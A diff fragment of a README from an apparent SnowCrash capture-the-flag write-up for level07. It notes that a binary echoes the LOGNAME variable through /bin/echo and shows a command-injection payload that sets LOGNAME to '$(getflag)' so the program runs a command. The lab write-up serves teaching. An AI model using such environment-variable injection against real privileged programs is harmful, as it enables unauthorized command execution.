J0hann3/SnowCrash/level07/README.md

   /bin/echo %s
   ;*2$"
   ```
+The binary uses:
+- `/bin/echo`
+- The environment variable `LOGNAME`
+- The `getenv` function to retrieve the value of `LOGNAME`

+---

+### 3. Exploit the `level07` executable
-- The enviroment contains the variable `LOGNAME=level07`, so lets change it to get the flag
+The environment contains the variable `LOGNAME=level07`.
+By modifying this variable to execute `getflag`, we can retrieve the flag.
   ```bash
   > export LOGNAME='$(getflag)'
   > ./level07